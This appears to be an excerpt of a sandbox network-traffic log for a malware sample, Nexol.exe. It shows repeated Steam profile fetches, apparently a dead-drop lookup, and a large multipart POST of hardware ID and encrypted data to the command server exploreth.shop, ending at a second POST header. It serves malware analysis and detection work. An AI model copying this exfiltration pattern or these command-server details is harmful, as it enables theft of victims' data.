11	192.168.2.4	49737	23.210.122.61	443	7876	C:\Users\user\Desktop\Nexol.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 23:00:03 UTC	94	OUT	GET /profiles/76561199822375128 HTTP/1.1 Connection: Keep-Alive Host: steamcommunity.com
2025-03-11 23:00:03 UTC	1962	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 11 Mar 2025 23:00:03 GMT Content-Length: 35720 Connection: close Set-Cookie: sessionid=08b96baed9fca447ab2a1db6; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cc0f181fbe5ce05fc270cb5f240b10db6; path=/; secure; HttpOnly; SameSite=None
2025-03-11 23:00:03 UTC	14422	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-11 23:00:03 UTC	10154	IN	Data Raw: 3d 22 73 65 6c 65 63 74 6f 72 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 63 6f 6e 74 65 6e 74 3d 22 2e 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 43 4f 4d 4d 55 4e 49 54 59 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 20 64 61 74 61 2d 73 75 62 6d 65 6e 75 69 64 3d 22 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 3e 0a 09 09 09 09 09 09 48 6f 6d 65 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: ="selector" data-tooltip-content=".submenu_Community">COMMUNITY</a><div class="submenu_Community" style="display: none;" data-submenuid="Community"><a class="submenuitem" href="https://steamcommunity.com/">Home
2025-03-11 23:00:03 UTC	11144	IN	Data Raw: 3b 45 52 45 41 4c 4d 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 4c 4f 47 49 4e 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 41 56 41 54 41 52 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 61 76 61 74 61 72 73 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 46 52 4f 4d 5f 57 45 42 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 57 45 42 53 49 54 45 5f 49 44 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 43 6f 6d 6d 75 6e 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 53 45 5f Data Ascii: ;EREALM":1,"LOGIN_BASE_URL":"https:\/\/login.steampowered.com\/","AVATAR_BASE_URL":"https:\/\/avatars.fastly.steamstatic.com\/","FROM_WEB":true,"WEBSITE_ID":"Community","BASE_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49738	104.21.16.1	443	7876	C:\Users\user\Desktop\Nexol.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 23:00:05 UTC	273	OUT	POST /gJKDA HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=tyuvvWlM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 583668 Host: exploreth.shop
2025-03-11 23:00:05 UTC	15331	OUT	Data Raw: 2d 2d 74 79 75 76 76 57 6c 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 37 65 31 66 62 63 32 38 35 30 34 33 64 32 33 62 61 32 65 33 31 34 66 34 66 66 38 30 62 63 36 64 61 37 39 66 39 36 61 61 35 64 34 62 38 65 61 31 33 62 31 39 37 39 34 30 0d 0a 2d 2d 74 79 75 76 76 57 6c 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 74 79 75 76 76 57 6c 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 41 37 33 46 38 39 43 46 41 39 31 39 39 34 31 37 41 36 Data Ascii: --tyuvvWlMContent-Disposition: form-data; name="uid"7e1fbc285043d23ba2e314f4ff80bc6da79f96aa5d4b8ea13b197940--tyuvvWlMContent-Disposition: form-data; name="pid"1--tyuvvWlMContent-Disposition: form-data; name="hwid"EA73F89CFA9199417A6
2025-03-11 23:00:05 UTC	15331	OUT	Data Raw: 34 ff ba 31 ab 8e 17 f0 87 47 75 81 16 04 e1 25 db c6 fb 7b 8c d7 5c 9f ab ce 73 fb 62 f6 05 77 2a 81 8b 55 03 5f 54 a7 f1 40 a4 60 b6 6f ca 08 3d 7a 8b 71 20 f8 39 b8 88 be 57 da ee 6b f0 db 5f 47 60 ae a5 a6 c4 55 fb 80 9d 3b 6f b2 47 d9 7d 1e 80 4a 46 0c dd 4b c8 79 15 40 89 ce 49 8b 9d 87 96 71 5d e5 4d 6c bc 0f 62 17 3e ae 7d 17 b2 57 72 25 e3 85 f0 c4 86 f7 fe 40 ec c1 b3 81 8b 6e 83 a2 7b ee 12 e7 37 5b fd 77 97 27 0a ca 31 3a 7c ec 53 9f 11 71 ef 03 8b fe 09 30 2a 3a d2 51 03 ab b4 0a e2 20 91 25 f1 26 51 f5 7d 3f 12 e4 ac e0 98 67 de c1 c0 51 21 aa c9 a2 94 04 11 90 4c 74 a1 95 b3 7b 61 a9 41 f8 fa 72 33 26 03 b6 f7 b6 3b 41 cc 06 43 d6 99 48 ec 00 ef f1 60 f2 82 b9 c0 67 ee 80 43 93 0e 38 a1 f2 ab 9c fa ff f4 58 ac 8f d5 b9 cc 0b 63 4b cd 6a 8c Data Ascii: 41Gu%{\sbwU_T@`o=zq 9Wk_G`U;oG}JFKy@Iq]Mlb>}Wr%@n{7[w'1:\|Sq0:Q %&Q}?gQ!Lt{aAr3&;ACH`gC8XcKj
2025-03-11 23:00:05 UTC	15331	OUT	Data Raw: f3 56 66 f0 fa b5 c6 c1 cd 7e aa 92 16 7a a7 25 e8 dd 30 4b 0c cd 67 57 b9 a4 61 57 05 03 cd 7d 2b 5a ff c5 d3 e7 3c e3 4b e2 e4 ac 0d 61 ed 5e 5a 9d ec 0b 98 f2 f8 87 66 51 1c e7 09 85 a5 ba 0b 14 4a 37 fc b6 4b 76 60 e8 ba 8c 64 5e 56 f4 32 f3 dd 45 14 77 3d 86 ff ef 2e ed 19 14 6f f2 71 8f b3 7b e7 55 46 6c 82 cd cc 01 7a f9 2a e3 ac 57 b2 70 36 9d d0 a7 8d db 6f 05 ec b2 10 85 72 23 35 14 08 e3 5e 41 44 cc 5e 86 81 6b 2e 70 f3 67 93 c2 da d6 e9 e3 5a cf 7e 90 58 19 a2 2f da e9 3c 1f e8 5c 55 97 e9 ba 89 c9 d1 b2 d8 aa d9 80 7e 19 a9 9f 23 e8 c2 84 5e 67 74 e9 10 96 4e a9 1b 56 d5 4e 56 c4 7a 6f 8b 2c 16 d8 b0 23 53 6b 18 90 e9 87 42 9d 71 52 0c 97 38 8c ba e6 b9 f7 dd 9c 7d ed c2 2c a2 50 0d 9c 92 24 55 11 35 b4 cb 17 71 32 0a 64 f9 38 02 e4 55 00 30 Data Ascii: Vf~z%0KgWaW}+Z<Ka^ZfQJ7Kv`d^V2Ew=.oq{UFlz*Wp6or#5^AD^k.pgZ~X/<\U~#^gtNVNVzo,#SkBqR8},P$U5q2d8U0
2025-03-11 23:00:05 UTC	15331	OUT	Data Raw: 06 2c 13 43 d9 b9 22 ff fe 2c 6e 94 cb 64 58 52 e6 8e d5 63 52 be 44 fc 13 08 90 54 aa 7c 3b f2 f2 ee 5c a8 09 f7 f8 8d b0 2c 0f 8c d7 b5 2c ad ea a4 e7 a1 69 41 e4 77 42 a7 a6 bb 2e b6 48 37 b7 4f ec ca ab 74 a0 fc a6 b5 4e 53 90 d3 56 61 f0 90 e4 e4 d2 66 35 39 e0 2a e3 e7 7e bd af 96 b9 45 c1 20 ba 09 3b 4c b2 e7 d7 39 48 b1 6a 9f 5b 6d 1e b0 70 47 10 f2 85 c2 2c 03 d8 ed bb 02 f8 d6 7d 11 f8 53 1d 9d 9d 43 16 62 15 04 f6 26 c6 21 af 20 33 d3 b9 51 92 cd 75 bd 37 68 a4 79 c2 d8 3e ae c2 ea 51 85 7a c2 a0 12 0b 05 36 47 a6 d7 32 86 52 15 b1 2b 76 ad 31 73 4f 1d f4 0a 8e 1e 23 60 97 fe b2 51 8a c0 75 3f c5 d3 93 94 db cc 2f b0 1c fe a1 b7 b2 7e f5 35 91 12 27 e1 48 17 d1 dc 37 1c ae a5 b9 a3 96 48 e3 39 93 43 b0 e2 d7 e2 f2 99 87 0c 49 90 62 ae 3a 84 0e Data Ascii: ,C",ndXRcRDT\|;\,,iAwB.H7OtNSVaf59*~E ;L9Hj[mpG,}SCb&! 3Qu7hy>Qz6G2R+v1sO#`Qu?/~5'H7H9CIb:
2025-03-11 23:00:05 UTC	15331	OUT	Data Raw: a4 69 25 8b 65 b8 bf f6 af d0 3a cb ca 74 b8 bf 62 63 40 7a 06 86 98 6b 66 8f 7a fb 4b 23 29 c7 09 bb ce b3 1a 83 ac dc 60 35 b0 ae b0 fb 62 17 03 5d 81 6b 96 ce 84 4d 41 e1 7f 12 b9 37 5b 01 26 9a 57 3e 22 f6 61 d7 7a e6 eb 05 98 ad 3b 63 d0 32 fe f5 cc d9 4d dd 55 8b e0 24 e4 92 e6 41 fb 05 f4 f2 51 6c 99 eb de 09 45 36 28 ec fe d4 e4 b5 be 02 5a 57 07 3d af 62 3a 62 c3 7f 83 33 0b f4 cc 77 35 d1 ae 7c 1d e5 6e 63 9f e6 99 17 87 24 fd 2d 5d 4b 82 21 8d cc c3 a8 4d 45 a7 66 ba e8 f2 c5 cf ec 6d ae e7 98 d3 14 90 d8 3b fd cf ea 4f 3e db d9 3d cd a4 f1 cf d0 f4 9d ba ae d4 2e e8 c6 fd bb d3 c0 54 b4 c6 02 1d 60 b2 ab 1d 57 67 04 cb c9 d8 26 19 eb f8 f1 84 f4 a0 cf 42 7a 8f cd b5 f2 d6 45 18 2b 78 39 8f f2 fa 1e 98 2c cf 8a 3e c8 51 84 22 33 4f c1 f8 da ee Data Ascii: i%e:tbc@zkfzK#)`5b]kMA7[&W>"az;c2MU$AQlE6(ZW=b:b3w5\|nc$-]K!MEfm;O>=.T`Wg&BzE+x9,>Q"3O
2025-03-11 23:00:05 UTC	15331	OUT	Data Raw: d1 7e ae d5 49 06 c1 81 da ce c0 51 c5 01 f6 32 d4 79 86 53 66 49 b0 3e e0 0e 4e 61 f3 c1 35 31 04 7f b9 8a b2 68 91 99 ac 88 c1 f9 ea 9d c3 a5 ac 99 9e 68 da 55 ef 93 92 2c 25 2f db 79 28 1b 2f 2e f3 51 85 fb 9b c0 cd 83 bc 86 23 9f 5a 40 e1 1a 55 1f 48 76 c5 a2 5e 48 8b 03 87 16 31 62 9b 3e 54 45 3d 57 76 b1 47 c1 62 a2 21 8a 09 5a 9f bb 64 a2 67 e3 40 a1 a3 0c a0 b1 84 af db c5 c3 b1 f2 6d 4a 6e 4b 62 cc 63 33 69 ff 83 19 04 3d fd ec 42 d0 c0 40 15 76 1a 8c 55 18 3a b4 7e 52 ed 95 33 2d 40 1f 32 f9 f8 52 76 67 d4 9a d1 8f c7 a6 af 3e 20 2a 63 19 f0 8b f5 6f cc 55 99 cb 5c 6d a3 95 9e a7 1f 79 b4 ce 2d 9d 1c e1 31 38 68 9c 9a 84 4b 57 bb 61 a3 4b 93 f1 90 29 96 72 01 61 de 0c 1d 70 0f f4 78 b3 ff 48 1f bd 79 e8 d7 bb 38 14 cb 20 76 ad e1 f9 0b 2d 09 9b Data Ascii: ~IQ2ySfI>Na51hhU,%/y(/.Q#Z@UHv^H1b>TE=WvGb!Zdg@mJnKbc3i=B@vU:~R3-@2Rvg> *coU\my-18hKWaK)rapxHy8 v-
2025-03-11 23:00:05 UTC	15331	OUT	Data Raw: 95 32 fd 12 4c 7e 60 a4 0c 56 87 e7 92 4c 18 07 c2 c4 74 91 4b 76 77 42 45 12 5c a0 57 d0 ce 11 fc 28 5d 3f b3 9d 92 62 f2 4a 71 83 fe c3 f7 eb 4b 80 57 ca ba 09 29 c8 93 0c 43 2e 68 47 4e 2e f5 c8 89 e8 3e 13 08 ad fa 32 b7 66 ae dc 2a 35 1b e9 84 45 a0 68 92 06 18 0d ac 44 e4 e9 91 3a 7a bb 09 11 52 79 fe cd 88 83 5f 7e 0a 6c 8a 23 89 83 5f 06 a3 71 53 49 b9 7f 7e 18 67 7e 06 fe 63 7d cb 93 62 36 d8 51 24 34 a3 18 a9 cc 29 bf d3 a1 bb 19 ff 0a d8 88 a9 9f 49 5d 61 13 5c 1e 2f 73 09 2a 06 e3 b0 02 1e a8 ad f4 8a 83 8e 4e 5e 3c 9d 73 bf 95 41 5f a7 78 7f 3b d6 10 21 17 38 98 0d 8b c7 5d 38 b5 1f 36 a3 6d e8 57 34 7f 86 ad 8f 52 7b 66 fa 48 23 3d c6 5d 54 83 6b 72 1f 63 c2 f3 e2 a3 79 4e fa e7 e5 9a 58 98 86 58 a0 ad 13 2f 52 8b 9e 0d 5f b4 2b 4d d2 69 42 Data Ascii: 2L~`VLtKvwBE\W(]?bJqKW)C.hGN.>2f5EhD:zRy_~l#_qSI~g~c}b6Q$4)I]a\/sN^<sA_x;!8]86mW4R{fH#=]TkrcyNXX/R_+MiB
2025-03-11 23:00:05 UTC	15331	OUT	Data Raw: 40 0f 97 c1 60 e6 88 22 91 8f 0f 2e e7 50 ba cf 62 25 7d fc ee cb d1 4a 0f a4 70 61 d1 4f 57 cd 9b c5 db 95 5b e1 5b 13 b0 98 13 88 3b 3e d9 17 17 17 0b 41 c0 63 88 c6 c1 d6 53 bf 0b df e8 00 25 1e 07 f9 58 26 1e be 32 d5 83 43 d4 0b 0b b2 34 8e 3b c7 21 c8 3f bf 0f 25 81 48 1c ee 49 76 46 26 09 11 fb eb 44 e0 55 74 a4 e1 ca c4 7e 74 b3 e0 5f da 47 8a e4 35 50 60 db 2f 4e ea 8b 14 17 a7 b5 19 ee 3d 9c a7 47 67 b0 17 d2 36 18 d3 4d 6d 9d 75 1b 26 30 40 b2 2a f3 b8 ae d6 92 67 48 90 d6 15 c1 35 60 b2 b2 3a ee 11 22 84 b6 40 c3 80 d2 d7 88 73 57 cc ff 0f c2 8b 68 fb 50 35 f9 0a 0f 56 87 ce 69 26 f6 b0 0f 9b 26 fc 3c 75 51 e5 e8 5f e1 cc 4e 59 88 6e 97 ef 9d a4 90 14 ce 7a 0e 77 3d 97 c6 b1 3f bd 33 13 46 4f 7c 98 00 b6 2c 32 9b 57 eb 3e 99 7d af d4 0c 6a 67 Data Ascii: @`".Pb%}JpaOW[[;>AcS%X&2C4;!?%HIvF&DUt~t_G5P`/N=Gg6Mmu&0@*gH5`:"@sWhP5Vi&&<uQ_NYnzw=?3FO\|,2W>}jg
2025-03-11 23:00:05 UTC	15331	OUT	Data Raw: 17 55 a4 4e 27 4a c7 d7 9d 52 2b c5 df 3c 90 cd 59 b6 87 bf de 26 12 55 a1 c2 1b ef 92 f9 65 b1 09 7c a1 95 fd 36 ef c1 2e 42 18 12 4f e9 98 66 3f dd e8 c0 43 bb e3 37 91 d1 12 b8 c3 91 79 83 72 62 f3 24 c3 45 1b 36 d9 25 59 e5 03 d8 b5 bd af 45 20 9c b9 bb 7c 7c 47 9c d8 53 05 c9 ec 3c 97 3f 47 30 44 c1 8f c3 48 3a 30 f0 fe 57 a1 c4 4c ca 50 47 ac 53 bf d7 8f 94 64 96 b0 aa a6 88 1c 2c 87 b7 56 48 67 77 56 d1 39 6b 9b 37 4a 04 e2 1c b5 9b f1 cf 86 1a eb 9b 08 57 a6 43 8c 43 4c 2d fb 24 b1 1f 40 25 59 d5 da 86 9f 72 5a 09 1b 3e c0 90 86 07 70 85 dc dd ae ec 65 f8 c1 82 11 ba 94 e9 00 6b 7e c7 ce 08 04 70 45 d2 3f 68 7a 1c f5 61 0f 58 e1 da 9d 59 d9 71 ce 7c 02 c8 e2 a3 9b ac 88 bd 65 a5 3a a1 90 a8 8e 6b 75 99 3b 87 75 45 ba 0d a8 91 23 6f 61 70 e2 27 27 Data Ascii: UN'JR+<Y&Ue\|6.BOf?C7yrb$E6%YE \|\|GS<?G0DH:0WLPGSd,VHgwV9k7JWCCL-$@%YrZ>pek~pE?hzaXYq\|e:ku;uE#oap''
2025-03-11 23:00:05 UTC	15331	OUT	Data Raw: cb be 47 62 b3 02 da e2 9f a7 00 21 d6 2d ed 6e 1c b5 b6 cf 64 d3 6e c2 9c 43 fa 34 6d d8 87 62 6a fb b8 62 24 a4 62 55 06 2a 6e 02 cc 11 bb 07 33 f9 a9 12 ad 53 f2 93 f9 2b 4e ce 30 f4 74 3f f1 8f a6 30 9d 0e e1 35 24 e8 1c 01 67 8e 72 fe 2d 64 36 3d cc d8 0b 13 dc a2 13 16 db 53 3f 71 e0 9f 25 81 c8 39 21 e9 ca a3 38 f5 ca 39 57 51 2e d7 1b 05 45 f6 3e a4 ff 5f f3 58 ee 4c 36 f2 93 3d d8 61 67 6f 2d 7d 5f fb 02 4b 7e 6b 5e 12 29 91 88 a2 db 8a 98 22 5e 9c 5e bf 11 60 8f 6d 67 9e 91 db 88 92 3f 75 67 72 31 e0 d1 f4 7a 3b dd 67 ef c6 a6 c5 34 29 ba 60 fa 97 08 6c 77 9c 5b a4 99 fc 01 a2 6b 37 15 a9 d3 14 79 8a 1e 87 3f 5e 96 64 6f f2 c8 3a 4a 4f 9b d7 b3 2a 62 e9 66 5b 1c 99 f3 e9 50 77 50 8e b3 6b 3d 0e e3 b1 58 59 ca ca 87 7b 6a 71 fe 3f a4 60 55 c2 6a Data Ascii: Gb!-ndnC4mbjb$bUn3S+N0t?05$gr-d6=S?q%9!89WQ.E>_XL6=ago-}_K~k^)"^^`mg?ugr1z;g4)`lw[k7y?^do:JObf[PwPk=XY{jq?`Uj
2025-03-11 23:00:07 UTC	825	IN	HTTP/1.1 200 OK Date: Tue, 11 Mar 2025 23:00:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R8tLZzc5WsC8iTa8JcH%2FvODmq6BaJBMWXFh0lj8qusFhM0UwWTok%2BZuDKQNe8UkaUiFQ7Qxhn4fjNpl%2BNejs7VxZfyADx%2B4s23ZGWfYkwX9ZwzWjuxfReZyDfhiNYS%2FKOg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91eeaa805cbbf493-IAD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=21098&min_rtt=19711&rtt_var=8251&sent=196&recv=441&lost=0&retrans=0&sent_bytes=2833&recv_bytes=586249&delivery_rate=96956&cwnd=198&unsent_bytes=0&cid=aa1d9cfe17e96505&ts=2120&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49739	23.210.122.61	443	7876	C:\Users\user\Desktop\Nexol.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 23:00:09 UTC	94	OUT	GET /profiles/76561199822375128 HTTP/1.1 Connection: Keep-Alive Host: steamcommunity.com
2025-03-11 23:00:10 UTC	1962	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 X-Frame-Options: SAMEORIGIN Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Tue, 11 Mar 2025 23:00:10 GMT Content-Length: 35720 Connection: close Set-Cookie: sessionid=40ba30af86b41edfc37c9461; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cc0f181fbe5ce05fc270cb5f240b10db6; path=/; secure; HttpOnly; SameSite=None
2025-03-11 23:00:10 UTC	14422	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
2025-03-11 23:00:10 UTC	10154	IN	Data Raw: 3d 22 73 65 6c 65 63 74 6f 72 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 63 6f 6e 74 65 6e 74 3d 22 2e 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 43 4f 4d 4d 55 4e 49 54 59 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 5f 43 6f 6d 6d 75 6e 69 74 79 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 22 20 64 61 74 61 2d 73 75 62 6d 65 6e 75 69 64 3d 22 43 6f 6d 6d 75 6e 69 74 79 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 3e 0a 09 09 09 09 09 09 48 6f 6d 65 09 09 09 09 09 09 09 09 09 09 09 Data Ascii: ="selector" data-tooltip-content=".submenu_Community">COMMUNITY</a><div class="submenu_Community" style="display: none;" data-submenuid="Community"><a class="submenuitem" href="https://steamcommunity.com/">Home
2025-03-11 23:00:10 UTC	11144	IN	Data Raw: 3b 45 52 45 41 4c 4d 26 71 75 6f 74 3b 3a 31 2c 26 71 75 6f 74 3b 4c 4f 47 49 4e 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 6c 6f 67 69 6e 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 41 56 41 54 41 52 5f 42 41 53 45 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 61 76 61 74 61 72 73 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 46 52 4f 4d 5f 57 45 42 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 57 45 42 53 49 54 45 5f 49 44 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 43 6f 6d 6d 75 6e 69 74 79 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 42 41 53 45 5f Data Ascii: ;EREALM":1,"LOGIN_BASE_URL":"https:\/\/login.steampowered.com\/","AVATAR_BASE_URL":"https:\/\/avatars.fastly.steamstatic.com\/","FROM_WEB":true,"WEBSITE_ID":"Community","BASE_

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49741	104.21.16.1	443	7876	C:\Users\user\Desktop\Nexol.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-11 23:00:12 UTC	265	OUT	POST /gJKDA HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 103 Host: exploreth.shop
